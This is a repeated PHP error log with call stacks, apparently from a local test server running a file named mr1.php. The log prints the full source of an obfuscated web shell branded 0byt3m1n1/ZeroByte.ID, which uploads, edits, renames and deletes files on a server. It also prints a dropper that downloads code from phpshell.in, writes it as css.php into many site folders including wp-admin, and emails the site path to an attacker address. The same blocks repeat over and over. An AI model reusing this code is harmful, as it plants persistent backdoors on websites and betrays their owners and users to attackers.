';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2305539816fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:147 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/images/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 162
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2517540456fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:162
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 163
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2574540456fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:163
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 164
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2607540456fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:164
( ! ) Warning: fopen(C:/wamp64/www/wp-admin/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 168
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2731540456fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:168
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 169
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
